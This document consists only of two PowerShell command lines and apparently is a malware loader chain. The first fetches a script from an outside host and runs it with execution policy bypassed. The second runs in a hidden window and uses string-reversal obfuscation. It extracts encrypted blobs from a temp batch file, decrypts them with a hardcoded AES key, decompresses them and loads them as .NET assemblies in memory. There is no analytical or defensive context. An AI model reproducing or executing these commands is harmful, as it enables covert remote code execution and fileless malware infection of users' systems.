powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function fn1($p1){ $a=[System.Security.Cryptography.Aes]::Create(); $a.Mode=[System.Security.Cryptography.CipherMode]::CBC; $a.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $a.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('r+bFNsKWcrMhhN0VNqHyPpVzm490/5Y+urqm0SsiN9g='); $a.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QFHft5W2NiDlaGOW8LKzjw=='); $d=$a.CreateDecryptor(); $r=$d.TransformFinalBlock($p1, 0, $p1.Length); $d.Dispose(); $a.Dispose(); $r;}function fn2($p2){ $m1=New-Object System.IO.MemoryStream(,$p2); $m2=New-Object System.IO.MemoryStream; $g=New-Object System.IO.Compression.GZipStream($m1, [IO.Compression.CompressionMode]::Decompress); $g.CopyTo($m2); $g.Dispose(); $m1.Dispose(); $m2.Dispose(); $m2.ToArray();}function fn3($p3, $p4){ $a1=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$p3); $e=$a1.EntryPoint; $e.Invoke($null, $p4);}$p='C:\Users\Admin\AppData\Local\Temp\c.bat';$host.UI.RawUI.WindowTitle = $p;$c=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($p).Split([Environment]::NewLine);foreach ($l in $c) { if ($l.StartsWith(':: ')) { $pl=$l.Substring(3); break; }}$pdata=[string[]]$pl.Split('\');$p1=fn2 (fn1 ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($pdata[0])));$p2=fn2 (fn1 ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($pdata[1])));fn3 $p1 $null;fn3 $p2 (,[string[]] (''));